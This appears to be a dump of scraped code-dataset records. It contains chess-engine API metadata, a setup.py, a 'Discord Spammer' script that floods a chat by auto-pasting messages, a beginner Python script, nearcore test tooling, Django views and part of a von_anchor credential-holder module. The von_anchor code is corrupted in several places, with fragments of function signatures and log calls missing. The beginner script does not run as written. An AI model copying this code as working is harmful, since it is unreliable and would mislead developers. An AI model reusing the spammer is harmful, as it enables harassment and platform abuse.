"call"}, {"api_name": "pieces.rook.cRook", "line_number": 123, "usage_type": "call"}, {"api_name": "match.undo_move", "line_number": 125, "usage_type": "call"}, {"api_name": "match.readfield", "line_number": 132, "usage_type": "call"}, {"api_name": "match.do_move", "line_number": 133, "usage_type": "call"}, {"api_name": "match.color_of_piece", "line_number": 134, "usage_type": "call"}, {"api_name": "match.undo_move", "line_number": 135, "usage_type": "call"}, {"api_name": "match.readfield", "line_number": 141, "usage_type": "call"}, {"api_name": "match.color_of_piece", "line_number": 142, "usage_type": "call"}, {"api_name": "match.do_move", "line_number": 145, "usage_type": "call"}, {"api_name": "match.undo_move", "line_number": 147, "usage_type": "call"}, {"api_name": "match.next_color", "line_number": 162, "usage_type": "call"}, {"api_name": "pieces.king.cKing", "line_number": 163, "usage_type": "call"}, {"api_name": "match.board", "line_number": 163, "usage_type": "attribute"}, {"api_name": "pieces.king.cKing", "line_number": 165, "usage_type": "call"}, {"api_name": "match.board", "line_number": 165, "usage_type": "attribute"}, {"api_name": "match.do_move", "line_number": 171, 
"usage_type": "call"}, {"api_name": "match.is_move_available", "line_number": 172, "usage_type": "call"}, {"api_name": "match.undo_move", "line_number": 173, "usage_type": "call"}, {"api_name": "match.readfield", "line_number": 178, "usage_type": "call"}, {"api_name": "match.color_of_piece", "line_number": 179, "usage_type": "call"}, {"api_name": "pieces.queen.cQueen.STEPS", "line_number": 181, "usage_type": "attribute"}, {"api_name": "pieces.queen.cQueen", "line_number": 181, "usage_type": "name"}, {"api_name": "pieces.piece.cTouch", "line_number": 183, "usage_type": "call"}, {"api_name": "pieces.piece.cTouch", "line_number": 184, "usage_type": "call"}, {"api_name": "pieces.rook.cRook", "line_number": 186, "usage_type": "name"}, {"api_name": "pieces.rook.cRook.dir_for_move", "line_number": 187, "usage_type": "call"}, {"api_name": "pieces.rook.cRook", "line_number": 187, "usage_type": "name"}, {"api_name": "pieces.bishop.cBishop", "line_number": 190, "usage_type": "name"}, {"api_name": "pieces.bishop.cBishop.dir_for_move", "line_number": 191, "usage_type": "call"}, {"api_name": "pieces.bishop.cBishop", "line_number": 191, "usage_type": "name"}, {"api_name": "match.REVERSE_DIRS", "line_number": 198, "usage_type": "attribute"}, {"api_name": "match.search", "line_number": 200, "usage_type": "call"}, {"api_name": "match.readfield", "line_number": 202, "usage_type": "call"}, {"api_name": "match.color_of_piece", "line_number": 216, "usage_type": "call"}, {"api_name": "match.color_of_piece", "line_number": 217, "usage_type": "call"}, {"api_name": "match.color_of_piece", "line_number": 227, "usage_type": "call"}, {"api_name": "match.color_of_piece", "line_number": 228, "usage_type": "call"}, {"api_name": "match.readfield", "line_number": 242, "usage_type": "call"}, {"api_name": "match.color_of_piece", "line_number": 243, "usage_type": "call"}, {"api_name": "match.do_move", "line_number": 245, "usage_type": "call"}, {"api_name": "match.undo_move", "line_number": 247, "usage_type": "call"}, {"api_name": "match.writefield", "line_number": 249, "usage_type": "call"}, {"api_name": "match.writefield", "line_number": 257, "usage_type": "call"}, {"api_name": "match.readfield", "line_number": 266, "usage_type": "call"}, {"api_name": "match.color_of_piece", "line_number": 267, "usage_type": "call"}, {"api_name": "match.search_bi_dirs", "line_number": 276, "usage_type": "call"}, {"api_name": "match.readfield", "line_number": 281, "usage_type": "call"}, {"api_name": "match.readfield", "line_number": 282, "usage_type": "call"}, {"api_name": "match.color_of_piece", "line_number": 283, "usage_type": "call"}, {"api_name": "match.color_of_piece", "line_number": 285, "usage_type": "call"}, {"api_name": "match.do_move", "line_number": 291, "usage_type": "call"}, {"api_name": "match.search_bi_dirs", "line_number": 296, "usage_type": "call"}, {"api_name": "match.readfield", "line_number": 301, "usage_type": "call"}, {"api_name": "match.readfield", "line_number": 302, "usage_type": "call"}, {"api_name": "match.color_of_piece", "line_number": 303, "usage_type": "call"}, {"api_name": "match.color_of_piece", "line_number": 305, "usage_type": "call"}, {"api_name": "match.undo_move", "line_number": 311, "usage_type": "call"}, {"api_name": "pieces.pawn.cPawn", "line_number": 323, "usage_type": "call"}, {"api_name": "match.readfield", "line_number": 329, "usage_type": "call"}, {"api_name": "match.color_of_piece", "line_number": 330, "usage_type": "call"}, {"api_name": "match.readfield", "line_number": 335, "usage_type": 
"call"}, {"api_name": "match.color_of_piece", "line_number": 336, "usage_type": "call"}, {"api_name": "match.color_of_piece", "line_number": 338, "usage_type": "call"}, {"api_name": "match.readfield", "line_number": 345, "usage_type": "call"}, {"api_name": "pieces.bishop.cBishop", "line_number": 348, "usage_type": "call"}, {"api_name": "pieces.rook.cRook", "line_number": 351, "usage_type": "call"}, {"api_name": "pieces.queen.cQueen", "line_number": 354, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 360, "usage_type": "call"}, {"api_name": "helper.reverse_lookup", "line_number": 375, "usage_type": "call"}, {"api_name": "match.is_opening", "line_number": 390, "usage_type": "call"}, {"api_name": "match.readfield", "line_number": 391, "usage_type": "call"}, {"api_name": "match.board", "line_number": 393, "usage_type": "attribute"}, {"api_name": "match.board", "line_number": 394, "usage_type": "attribute"}, {"api_name": "match.board", "line_number": 397, "usage_type": "attribute"}, {"api_name": "match.board", "line_number": 398, "usage_type": "attribute"}, {"api_name": "match.board", "line_number": 401, "usage_type": "attribute"}, {"api_name": "match.board", "line_number": 402, "usage_type": "attribute"}, {"api_name": "match.board", "line_number": 405, "usage_type": "attribute"}, {"api_name": "match.board", "line_number": 406, "usage_type": "attribute"}, {"api_name": "match.board", "line_number": 409, "usage_type": "attribute"}, {"api_name": "match.board", "line_number": 410, "usage_type": "attribute"}, {"api_name": "match.board", "line_number": 413, "usage_type": "attribute"}, {"api_name": "match.board", "line_number": 414, "usage_type": "attribute"}, {"api_name": "match.is_soft_pin", "line_number": 439, "usage_type": "call"}, {"api_name": "match.is_soft_pin", "line_number": 446, "usage_type": "call"}, {"api_name": "match.do_move", "line_number": 452, "usage_type": "call"}, {"api_name": "pieces.king.cKing", "line_number": 453, "usage_type": "call"}, {"api_name": "match.undo_move", "line_number": 455, "usage_type": "call"}, {"api_name": "match.readfield", "line_number": 492, "usage_type": "call"}, {"api_name": "match.color_of_piece", "line_number": 493, "usage_type": "call"}, {"api_name": "match.is_soft_pin", "line_number": 540, "usage_type": "call"}, {"api_name": "match.readfield", "line_number": 582, "usage_type": "call"}, {"api_name": "operator.attrgetter", "line_number": 585, "usage_type": "call"}, {"api_name": "match.readfield", "line_number": 591, "usage_type": "call"}, {"api_name": "operator.attrgetter", "line_number": 595, "usage_type": "call"}, {"api_name": "match.readfield", "line_number": 601, "usage_type": "call"}, {"api_name": "operator.attrgetter", "line_number": 605, "usage_type": "call"}, {"api_name": "match.readfield", "line_number": 611, "usage_type": "call"}, {"api_name": "operator.attrgetter", "line_number": 615, "usage_type": "call"}, {"api_name": "match.readfield", "line_number": 621, "usage_type": "call"}, {"api_name": "operator.attrgetter", "line_number": 625, "usage_type": "call"}, {"api_name": "match.readfield", "line_number": 631, "usage_type": "call"}, {"api_name": "operator.attrgetter", "line_number": 635, "usage_type": "call"}, {"api_name": "match.readfield", "line_number": 641, "usage_type": "call"}, {"api_name": "operator.attrgetter", "line_number": 661, "usage_type": "call"}]} +{"seq_id": "6523972302", "text": "from setuptools import setup\nimport unittest\n\ndef para_test_suite():\n test_loader = unittest.TestLoader()\n test_suite = 
test_loader.discover('tests', pattern='test_*.py')\n return test_suite\n\nsetup(name='para',\n version='2.0.1',\n author='Migdalo',\n license='MIT',\n packages=['para'],\n test_suite='setup.para_test_suite',\n entry_points={\n 'console_scripts': [\n 'para = para.para:process_arguments'\n ]\n },\n zip_safe=True)\n\n", "repo_name": "Migdalo/para", "sub_path": "setup.py", "file_name": "setup.py", "file_ext": "py", "file_size_in_byte": 494, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "53", "api": [{"api_name": "unittest.TestLoader", "line_number": 5, "usage_type": "call"}, {"api_name": "setuptools.setup", "line_number": 9, "usage_type": "call"}]} +{"seq_id": "41898045274", "text": "from pynput.keyboard import Key, Controller\r\nimport time\r\nimport clipboard\r\n\r\nfrom tkinter import *\r\n# Packages\r\ngui = Tk()\r\n\r\n\r\ngui.geometry(\"800x300\")\r\ngui.resizable(width=False, height=False)\r\ngui.title('Discord Spammer')\r\n# GUI\r\n\r\ndef getTextInput():\r\n result = text_box.get(\"1.0\",\"end\")\r\n clipboard.copy(result)\r\n# Text Input Value Command\r\n\r\ndef startSpamming():\r\n time.sleep(4)\r\n for _ in range(15):\r\n keyboard = Controller()\r\n with keyboard.pressed(Key.ctrl):\r\n keyboard.press('v')\r\n keyboard.release('v')\r\n keyboard.press(Key.enter)\r\n keyboard.release(Key.enter)\r\n time.sleep(0.5)\r\n\r\n# Main Spamming Command\r\n\r\n\r\nbtn = Button(gui, text = 'Copy Text', bg = 'gray', width = 20, height = 3, command = getTextInput)\r\nbtn.pack()\r\nbtn.place(x=340, y=130)\r\n# Copies a text\r\n\r\nbtn = Button(gui, text = 'Start Spam', bg = 'green', width = 40, height = 5, command = startSpamming)\r\nbtn.pack()\r\nbtn.place(x=270, y=200)\r\n# Start Spam Button\r\n\r\ntext_box = Text(\r\n gui,\r\n height=2,\r\n width=100,\r\n font=(\"Arial\", 32\r\n))\r\n\r\ntext_box.pack()\r\n# Text Box\r\n\r\ngui.mainloop()\r\n\r\n# Project by Fr0das\r\n# Project by Fr0das\r\n# Project by Fr0das", "repo_name": "Fr0das/discord-spammer", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 1208, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "clipboard.copy", "line_number": 17, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 21, "usage_type": "call"}, {"api_name": "pynput.keyboard.Controller", "line_number": 23, "usage_type": "call"}, {"api_name": "pynput.keyboard.Key.ctrl", "line_number": 24, "usage_type": "attribute"}, {"api_name": "pynput.keyboard.Key", "line_number": 24, "usage_type": "name"}, {"api_name": "pynput.keyboard.Key.enter", "line_number": 27, "usage_type": "attribute"}, {"api_name": "pynput.keyboard.Key", "line_number": 27, "usage_type": "name"}, {"api_name": "pynput.keyboard.Key.enter", "line_number": 28, "usage_type": "attribute"}, {"api_name": "pynput.keyboard.Key", "line_number": 28, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 29, "usage_type": "call"}]} +{"seq_id": "20548852206", "text": "print ('hi stupid')\nf_name = input('Whats your first name: ')\nl_name = input('How about a last name: ')\nborn_month = input(' What day of the month were you born?: ')\nborn_day = input('And the month?: ')\nborn_year = input('year?: ')\nprint('Hey ',f_name,l_name,' so your birthday is ',born_month, ' / ',born_day, '/',born_year)\nfrom datetime import date\ntoday = date.year \nprint (date.year )\ncalculate_age = today.year - born_year - ((today.month,today.day) < 
(born_month,born._day))\ntoday = date.today\n \n \n", "repo_name": "Kukukachuj/cti110", "sub_path": "Messingaround.py", "file_name": "Messingaround.py", "file_ext": "py", "file_size_in_byte": 505, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "datetime.date.year", "line_number": 9, "usage_type": "attribute"}, {"api_name": "datetime.date", "line_number": 9, "usage_type": "name"}, {"api_name": "datetime.date.year", "line_number": 10, "usage_type": "attribute"}, {"api_name": "datetime.date", "line_number": 10, "usage_type": "name"}, {"api_name": "datetime.date.today", "line_number": 12, "usage_type": "attribute"}, {"api_name": "datetime.date", "line_number": 12, "usage_type": "name"}]} +{"seq_id": "7671268003", "text": "import os\nimport pathlib\nimport subprocess\nimport sys\nimport tempfile\nimport typing\n\nimport semver\nfrom configured_logger import logger\nfrom github import Github\n\n\ndef current_branch():\n return os.environ.get('BUILDKITE_BRANCH') or subprocess.check_output([\n \"git\", \"rev-parse\", \"--symbolic-full-name\", \"--abbrev-ref\", \"HEAD\"\n ]).strip().decode()\n\n\ndef get_releases():\n git = Github(None)\n repo = git.get_repo(\"nearprotocol/nearcore\")\n releases = []\n\n for release in repo.get_releases():\n try:\n # make sure that the version provided is a valid semver version\n version = semver.VersionInfo.parse(release.title)\n releases.append(release)\n except Exception as e:\n pass\n\n return sorted(releases,\n key=lambda release: semver.VersionInfo.parse(release.title),\n reverse=True)\n\n\ndef latest_rc_branch():\n releases = list(\n filter(\n lambda release: (semver.VersionInfo.parse(release.title).prerelease\n or \"\").startswith(\"rc\"), get_releases()))\n\n if not releases:\n return None\n\n return semver.VersionInfo.parse(releases[0].title).finalize_version()\n\n\nclass Executables(typing.NamedTuple):\n root: pathlib.Path\n neard: pathlib.Path\n state_viewer: pathlib.Path\n\n def node_config(self) -> typing.Dict[str, typing.Any]:\n return {\n 'local': True,\n 'neard_root': self.root,\n 'binary_name': self.neard.name\n }\n\n\ndef _compile_binary(branch: str) -> Executables:\n \"\"\"For given branch, compile binary.\n\n Stashes current changes, switches branch and then returns everything back.\n \"\"\"\n # TODO: download pre-compiled binary from github for beta/stable?\n prev_branch = current_branch()\n stash_output = subprocess.check_output(['git', 'stash'])\n subprocess.check_output(['git', 'checkout', str(branch)])\n subprocess.check_output(['git', 'pull', 'origin', str(branch)])\n result = _compile_current(branch)\n subprocess.check_output(['git', 'checkout', prev_branch])\n if stash_output != b\"No local changes to save\\n\":\n subprocess.check_output(['git', 'stash', 'pop'])\n return result\n\n\ndef escaped(branch):\n return branch.replace('/', '-')\n\n\ndef _compile_current(branch: str) -> Executables:\n \"\"\"Compile current branch.\"\"\"\n subprocess.check_call(['cargo', 'build', '-p', 'neard', '--bin', 'neard'])\n subprocess.check_call(['cargo', 'build', '-p', 'near-test-contracts'])\n subprocess.check_call(['cargo', 'build', '-p', 'state-viewer'])\n branch = escaped(branch)\n build_dir = pathlib.Path('../target/debug')\n neard = build_dir / f'neard-{branch}'\n state_viewer = build_dir / f'state-viewer-{branch}'\n (build_dir / 'neard').rename(neard)\n (build_dir / 'state-viewer').rename(state_viewer)\n return Executables(build_dir, neard, state_viewer)\n\n\ndef 
download_file_if_missing(filename: pathlib.Path, url: str) -> None:\n \"\"\"Downloads a file from given URL if it does not exist already.\n\n Does nothing if file `filename` already exists. Otherwise, downloads data\n from `url` and saves them in `filename`. Downloading is done with `curl`\n tool and on failure (i.e. if it returns non-zero exit code) `filename` is\n not created. On success, the file’s mode is set to 0x555 (i.e. readable and\n executable by anyone).\n\n Args:\n filename: Path to the file.\n url: URL of the file to download (if the file is missing).\n \"\"\"\n if filename.exists():\n if not filename.is_file():\n sys.exit(f'{filename} exists but is not a file')\n return\n\n proto = '\"=https\"' if os.uname()[0] == 'Darwin' else '=https'\n cmd = ('curl', '--proto', proto, '--tlsv1.2', '-sSfL', url)\n name = None\n try:\n with tempfile.NamedTemporaryFile(dir=filename.parent,\n delete=False) as tmp:\n name = pathlib.Path(tmp.name)\n subprocess.check_call(cmd, stdout=tmp)\n name.chmod(0o555)\n name.rename(filename)\n name = None\n finally:\n if name:\n name.unlink()\n\n\ndef download_binary(uname, branch):\n \"\"\"Download binary for given platform and branch.\"\"\"\n logger.info(f'Getting near & state-viewer for {branch}@{uname}')\n outdir = pathlib.Path('../target/debug')\n basehref = ('https://s3-us-west-1.amazonaws.com/build.nearprotocol.com'\n f'/nearcore/{uname}/{branch}/')\n neard = outdir / f'neard-{branch}'\n state_viewer = outdir / f'state-viewer-{branch}'\n download_file_if_missing(neard, basehref + 'neard')\n download_file_if_missing(state_viewer, basehref + 'state-viewer')\n return Executables(outdir, neard, state_viewer)\n\n\nclass ABExecutables(typing.NamedTuple):\n stable: Executables\n current: Executables\n\n\ndef prepare_ab_test(stable_branch):\n # Use NEAR_AB_BINARY_EXISTS to avoid rebuild / re-download when testing locally.\n #if not os.environ.get('NEAR_AB_BINARY_EXISTS'):\n # _compile_current(current_branch())\n # uname = os.uname()[0]\n # if stable_branch in ['master', 'beta', 'stable'] and uname in ['Linux', 'Darwin']:\n # download_binary(uname, stable_branch)\n # else:\n is_nayduck = bool(os.getenv('NAYDUCK'))\n\n if is_nayduck:\n # On NayDuck the file is fetched from a builder host so there’s no need\n # to build it.\n root = pathlib.Path('../target/debug/')\n current = Executables(root, root / 'neard', root / 'state-viewer')\n else:\n current = _compile_current(current_branch())\n\n try:\n stable = download_binary(os.uname()[0], stable_branch)\n except Exception:\n if is_nayduck:\n sys.exit('RC binary should be downloaded for NayDuck.')\n stable = _compile_binary(str(stable_branch))\n return ABExecutables(stable=stable, current=current)\n", "repo_name": "MinnMinn/near-core", "sub_path": "pytest/lib/branches.py", "file_name": "branches.py", "file_ext": "py", "file_size_in_byte": 5936, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.environ.get", "line_number": 14, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 14, "usage_type": "attribute"}, {"api_name": "subprocess.check_output", "line_number": 14, "usage_type": "call"}, {"api_name": "github.Github", "line_number": 20, "usage_type": "call"}, {"api_name": "semver.VersionInfo.parse", "line_number": 27, "usage_type": "call"}, {"api_name": "semver.VersionInfo", "line_number": 27, "usage_type": "attribute"}, {"api_name": "semver.VersionInfo.parse", "line_number": 33, "usage_type": "call"}, {"api_name": 
"semver.VersionInfo", "line_number": 33, "usage_type": "attribute"}, {"api_name": "semver.VersionInfo.parse", "line_number": 40, "usage_type": "call"}, {"api_name": "semver.VersionInfo", "line_number": 40, "usage_type": "attribute"}, {"api_name": "semver.VersionInfo.parse", "line_number": 46, "usage_type": "call"}, {"api_name": "semver.VersionInfo", "line_number": 46, "usage_type": "attribute"}, {"api_name": "typing.NamedTuple", "line_number": 49, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 50, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 51, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 52, "usage_type": "attribute"}, {"api_name": "typing.Dict", "line_number": 54, "usage_type": "attribute"}, {"api_name": "typing.Any", "line_number": 54, "usage_type": "attribute"}, {"api_name": "subprocess.check_output", "line_number": 69, "usage_type": "call"}, {"api_name": "subprocess.check_output", "line_number": 70, "usage_type": "call"}, {"api_name": "subprocess.check_output", "line_number": 71, "usage_type": "call"}, {"api_name": "subprocess.check_output", "line_number": 73, "usage_type": "call"}, {"api_name": "subprocess.check_output", "line_number": 75, "usage_type": "call"}, {"api_name": "subprocess.check_call", "line_number": 85, "usage_type": "call"}, {"api_name": "subprocess.check_call", "line_number": 86, "usage_type": "call"}, {"api_name": "subprocess.check_call", "line_number": 87, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 89, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 97, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 112, "usage_type": "call"}, {"api_name": "os.uname", "line_number": 115, "usage_type": "call"}, {"api_name": "tempfile.NamedTemporaryFile", "line_number": 119, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 121, "usage_type": "call"}, {"api_name": "subprocess.check_call", "line_number": 122, "usage_type": "call"}, {"api_name": "configured_logger.logger.info", "line_number": 133, "usage_type": "call"}, {"api_name": "configured_logger.logger", "line_number": 133, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 134, "usage_type": "call"}, {"api_name": "typing.NamedTuple", "line_number": 144, "usage_type": "attribute"}, {"api_name": "os.getenv", "line_number": 157, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 162, "usage_type": "call"}, {"api_name": "os.uname", "line_number": 168, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 171, "usage_type": "call"}]} +{"seq_id": "36762020096", "text": "from django.shortcuts import render, render_to_response\nfrom django.template import RequestContext\nfrom django.views.generic.base import TemplateView\n\nfrom braces.views import SetHeadlineMixin\n\nclass IndexView(SetHeadlineMixin, TemplateView):\n headline = 'Home Page'\n template_name = 'index.html'\n\n\ndef handler404(request):\n response = render_to_response('error/base.html', {'error_code': 404},\n context_instance=RequestContext(request))\n response.status_code = 404\n return response\n\n\ndef handler500(request):\n response = render_to_response('error/base.html', {'error_code': 500},\n context_instance=RequestContext(request))\n response.status_code = 500\n return response", "repo_name": "aaronlelevier/django-payasyougo", "sub_path": "payg/payg/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 706, "program_lang": "python", "lang": "en", 
"doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "braces.views.SetHeadlineMixin", "line_number": 7, "usage_type": "name"}, {"api_name": "django.views.generic.base.TemplateView", "line_number": 7, "usage_type": "name"}, {"api_name": "django.shortcuts.render_to_response", "line_number": 13, "usage_type": "call"}, {"api_name": "django.template.RequestContext", "line_number": 14, "usage_type": "call"}, {"api_name": "django.shortcuts.render_to_response", "line_number": 20, "usage_type": "call"}, {"api_name": "django.template.RequestContext", "line_number": 21, "usage_type": "call"}]} +{"seq_id": "25292478842", "text": "import json\nimport logging\n\nfrom os import listdir, makedirs\nfrom os.path import basename, expanduser, isdir, isfile, join\nfrom time import time\nfrom typing import Set, Union\n\nfrom indy import anoncreds, ledger\nfrom indy.error import IndyError, ErrorCode\nfrom von_anchor.anchor.base import _BaseAnchor\nfrom von_anchor.cache import Caches, RevoCacheEntry, CRED_DEF_CACHE, REVO_CACHE, SCHEMA_CACHE\nfrom von_anchor.codec import canon_wql\nfrom von_anchor.error import (\n AbsentCred,\n AbsentCredDef,\n AbsentInterval,\n AbsentLinkSecret,\n AbsentRevReg,\n AbsentSchema,\n AbsentTails,\n BadIdentifier,\n BadRevStateTime,\n CacheIndex,\n ClosedPool,\n CredentialFocus)\nfrom von_anchor.nodepool import NodePool\nfrom von_anchor.tails import Tails\nfrom von_anchor.util import (\n cred_def_id2seq_no,\n ok_cred_def_id,\n ok_rev_reg_id,\n ok_schema_id,\n prune_creds_json,\n rev_reg_id2cred_def_id_tag)\nfrom von_anchor.validate_config import validate_config\nfrom von_anchor.wallet import Wallet\n\n\nLOGGER = logging.getLogger(__name__)\n\n\nclass HolderProver(_BaseAnchor):\n \"\"\"\n Mixin for anchor acting in the role of w3c Holder and indy-sdk Prover. A Holder holds\n credentials; a Prover produces proof of credentials. Revocation support requires\n the holder-prover anchor to manage tails files.\n \"\"\"\n\n def __init__(self, wallet: Wallet, pool: NodePool, cfg: dict = None) -> None:\n \"\"\"\n Initializer for HolderProver anchor. 
Retain input parameters; do not open wallet nor tails writer.\n\n :param wallet: wallet for anchor use\n :param pool: pool for anchor use\n :param cfg: configuration dict for cache archive behaviour; e.g.,\n\n ::\n\n {\n 'parse-cache-on-open': True\n 'archive-cache-on-close': True,\n }\n\n \"\"\"\n\n LOGGER.debug('HolderProver.__init__ >>> wallet: %s, pool: %s, cfg: %s', wallet, pool, cfg)\n\n super().__init__(wallet, pool)\n self._link_secret = None\n\n self._dir_tails = join(expanduser('~'), '.indy_client', 'tails')\n makedirs(self._dir_tails, exist_ok=True)\n\n self._cfg = cfg or {}\n validate_config('holder-prover', self._cfg)\n\n self._dir_cache = join(expanduser('~'), '.indy_client', 'cache', self.wallet.name)\n makedirs(self._dir_cache, exist_ok=True)\n\n LOGGER.debug('HolderProver.__init__ <<<')\n\n def _assert_link_secret(self, action: str):\n \"\"\"\n Raise AbsentLinkSecret if link secret is not set.\n\n :param action: action requiring link secret\n \"\"\"\n\n if self._link_secret is None:\n LOGGER.debug('HolderProver._assert_link_secret: action %s requires link secret but it is not set', action)\n raise AbsentLinkSecret('Action {} requires link secret but it is not set'.format(action))\n\n @property\n def cfg(self) -> dict:\n \"\"\"\n Accessor for configuration dict\n\n :return: holder-prover config dict\n \"\"\"\n\n return self._cfg\n\n @cfg.setter\n def cfg(self, value: dict) -> None:\n \"\"\"\n Set configuration dict\n\n :param value: configuration dict\n \"\"\"\n\n self._cfg = value or {}\n validate_config('holder-prover', self._cfg)\n\n @property\n def dir_cache(self) -> str:\n \"\"\"\n Accessor for cache archive directory\n\n :return: holder-prover cache archive directory\n \"\"\"\n\n return self._dir_cache\n\n async def _sync_revoc(self, rr_id: str) -> None:\n \"\"\"\n Pick up tails file reader handle for input revocation registry identifier. 
If no symbolic\n link is present, get the revocation registry definition to retrieve its tails file hash,\n then find the tails file and link it.\n\n Raise AbsentTails for missing corresponding tails file.\n\n :param rr_id: revocation registry identifier\n \"\"\"\n\n LOGGER.debug('HolderProver._sync_revoc >>> rr_id: %s', rr_id)\n\n if not ok_rev_reg_id(rr_id):\n LOGGER.debug('HolderProver._sync_revoc (str, int):\n \"\"\"\n Build rev reg delta json, potentially starting from existing (earlier) delta.\n\n Return delta json and its timestamp on the distributed ledger.\n\n Raise AbsentRevReg for no such revocation registry, or BadRevStateTime for a requested delta to\n a time preceding revocation registry creation.\n\n :param rr_id: rev reg id\n :param to: time (epoch seconds) of interest; upper-bounds returned timestamp\n :param fro: optional prior time of known delta json\n :param fro_delta: optional known delta as of time fro\n :return: rev reg delta json and ledger timestamp (epoch seconds)\n \"\"\"\n\n LOGGER.debug(\n '_HolderProver._build_rr_delta_json >>> rr_id: %s, to: %s, fro: %s, fro_delta: %s',\n rr_id,\n to,\n fro,\n fro_delta)\n\n if not ok_rev_reg_id(rr_id):\n LOGGER.debug('HolderProver._build_rr_delta_json str:\n \"\"\"\n Build and return indy-sdk requested credentials json from input indy-sdk creds structure\n through specified filter.\n\n :param creds: indy-sdk creds structure or list of cred-briefs (cred-info + interval)\n :param filt: filter mapping cred def ids to:\n - (optionally) 'attr-match': dict mapping attributes to values (omit, empty dict, or None to match all);\n - (optionally) 'minima': (pred) integer lower-bounds of interest (omit, empty dict, or None to match all);\n omit parameter or specify empty dict or None for no filter, matching all; e.g.,\n\n ::\n\n {\n 'Vx4E82R17q...:3:CL:16:0': {\n 'attr-match': {\n 'name': 'Alex',\n 'sex': 'M',\n 'favouriteDrink': None\n },\n 'minima': { # if both attr-match and minima present, combined conjunctively (i.e., via AND)\n 'favouriteNumber' : 10,\n 'score': 100 # if more than one minimum present, combined conjunctively (i.e., via AND)\n }\n },\n 'R17v42T4pk...:3:CL:19:0': {\n 'attr-match': {\n 'height': 175,\n 'birthdate': '1975-11-15' # combined conjunctively (i.e., via AND)\n }\n },\n 'Z9ccax812j...:3:CL:27:0': {\n 'attr-match': {} # match all attributes on this cred def\n },\n '9cHbp54C8n...:3:CL:37:0': {\n 'minima': { # request all attributes on this cred def, request preds specifying employees>=50\n 'employees' : 50,\n }\n }\n ...\n }\n\n :param filt_dflt_incl: whether to request (True) all creds by attribute/predicate\n that filter does not identify by cred def, or (False) to exclude them. 
Note that\n if the filter is None or {}, this parameter is unnecessary - it applies to a filter,\n not a non-filter.\n :return: indy_sdk requested_credentials json for use in proof creation\n \"\"\"\n\n LOGGER.debug('HolderProver.build_req_creds_json >>> creds: %s, filt: %s', creds, filt)\n\n req_creds = {\n 'self_attested_attributes': {},\n 'requested_attributes': {},\n 'requested_predicates': {}\n }\n\n def _add_brief(brief, uuid, req_creds_key):\n nonlocal req_creds\n req_creds[req_creds_key][uuid] = {\n 'cred_id': brief['cred_info']['referent'],\n 'revealed': True\n }\n if brief.get('interval', None):\n req_creds[req_creds_key][uuid]['timestamp'] = brief['interval']['to']\n if req_creds_key == 'requested_attributes':\n req_creds[req_creds_key][uuid]['revealed'] = True\n\n if filt:\n for cd_id in filt:\n if not ok_cred_def_id(cd_id):\n LOGGER.debug('HolderProver.build_req_creds_json str:\n \"\"\"\n Return path to the correct directory for the tails file on input revocation registry identifier.\n\n :param rr_id: revocation registry identifier of interest\n :return: path to tails dir for input revocation registry identifier\n \"\"\"\n\n LOGGER.debug('HolderProver.dir_tails >>>')\n\n if not ok_rev_reg_id(rr_id):\n LOGGER.debug('HolderProver.dir_tails 'HolderProver':\n \"\"\"\n Explicit entry. Perform ancestor opening operations,\n then parse cache from archive if so configured, and\n synchronize revocation registry to tails tree content.\n\n :return: current object\n \"\"\"\n\n LOGGER.debug('HolderProver.open >>>')\n\n await super().open()\n if self.cfg.get('parse-cache-on-open', False):\n Caches.parse(self.dir_cache)\n\n for path_rr_id in Tails.links(self._dir_tails):\n await self._sync_revoc(basename(path_rr_id))\n\n LOGGER.debug('HolderProver.open <<<')\n return self\n\n async def close(self) -> None:\n \"\"\"\n Explicit exit. If so configured, populate cache to prove all creds in\n wallet offline if need be, archive cache, and purge prior cache archives.\n\n :return: current object\n \"\"\"\n\n LOGGER.debug('HolderProver.close >>>')\n\n if self.cfg.get('archive-cache-on-close', False):\n await self.load_cache(True)\n Caches.purge_archives(self.dir_cache, True)\n\n await super().close()\n for path_rr_id in Tails.links(self._dir_tails):\n rr_id = basename(path_rr_id)\n try:\n await self._sync_revoc(rr_id)\n except ClosedPool:\n LOGGER.warning('HolderProver sync-revoc on close required ledger for %s but pool was closed', rr_id)\n\n LOGGER.debug('HolderProver.close <<<')\n\n async def rev_regs(self) -> list:\n \"\"\"\n Return list of revocation registry identifiers for which HolderProver has associated tails files.\n The operation creates associations for any (newly copied, via service wrapper API) tails files without.\n\n :return: list of revocation registry identifiers for which HolderProver has associated tails files\n \"\"\"\n\n LOGGER.debug('HolderProver.rev_regs >>>')\n\n for path_rr_id in Tails.links(self._dir_tails):\n await self._sync_revoc(basename(path_rr_id))\n\n rv = [basename(f) for f in Tails.links(self._dir_tails)]\n LOGGER.debug('HolderProver.rev_regs <<< %s', rv)\n return rv\n\n async def offline_intervals(self, cd_ids: list) -> dict:\n \"\"\"\n Return default non-revocation intervals for input cred def ids, based on content of revocation cache,\n for augmentation into specification for Verifier.build_proof_req_json. 
